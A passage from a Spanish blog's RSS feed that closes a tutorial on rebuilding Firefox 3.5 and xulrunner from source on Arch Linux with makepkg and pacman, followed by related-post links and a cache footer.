/> makepkg</code></p><p><strong>7. </strong>Una vez hayamos terminado de compilar, procedemos a instalar. Primero eliminemos las versiones que hemos instalado desde los repositorios:</p><p
style="padding-left: 30px;"><code>pacman -Rd firefox xulrunner</code></p><p>Es muy importante que los desinstales usando el flag <strong>-d,</strong> sino te pondrá problema por dependencias huérfanas. Ahora sí, instalemos:</p><p
style="padding-left: 30px;"><code>pacman -U ~/abs/xulrunner/xulrunner*.pkg.tar.gz<br
/> pacman -U ~/abs/firefox/firefox*.pkg.tar.gz</code></p><p>Y listo <img
src='http://www.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt="icon biggrin Solucionar crashes inesperados de Firefox 3.5" class='wp-smiley' title="Solucionar crashes inesperados de Firefox 3.5" /> <strong>Tu Firefox debería de estar funcionando perfectamente</strong> (almenos así fué en mi caso).</p><p>Las ventajas de trabajar con el código fuente. ¿Les quedó gustando? Pregunten por <strong>Gentoo</strong> entonces <img
src='http://www.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt="icon wink Solucionar crashes inesperados de Firefox 3.5" class='wp-smiley' title="Solucionar crashes inesperados de Firefox 3.5" /></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/samurai-entorno-de-trabajo-para-el-testing-de-seguridad-a-aplicativos-web.xhtml" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web">Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web</a></li><li><a
href="http://www.dragonjar.org/consejos-simples-de-seguridad-para-ir-a-la-campus-party.xhtml" title="Consejos Simples de Seguridad para ir a la Campus Party">Consejos Simples de Seguridad para ir a la Campus Party</a></li><li><a
href="http://www.dragonjar.org/configurando-ipv6-en-nuestro-equipo.xhtml" title="Configurando IPv6 en nuestro equipo">Configurando IPv6 en nuestro equipo</a></li><li><a
href="http://www.dragonjar.org/descarga-firefox-5-estable.xhtml" title="Descarga Firefox 5 Estable">Descarga Firefox 5 Estable</a></li><li><a
href="http://www.dragonjar.org/0day-en-google-chrome.xhtml" title="0day en Google Chrome">0day en Google Chrome</a></li><li><a
href="http://www.dragonjar.org/que-hace-realmente-el-espiaface.xhtml" title="Qué hace realmente Espia F a c e.com">Qué hace realmente Espia F a c e.com</a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-facebook.xhtml" title="Recupera tu Password de Facebook">Recupera tu Password de Facebook</a></li><li><a
href="http://www.dragonjar.org/la-vida-en-modo-texto-ii.xhtml" title="La vida en modo texto II">La vida en modo texto II</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/solucionar-crashes-inesperados-de-firefox-3-5.xhtml/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 41/179 queries in 0.168 seconds using disk: basic
Object Caching 7824/8063 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 16:27:56 -->
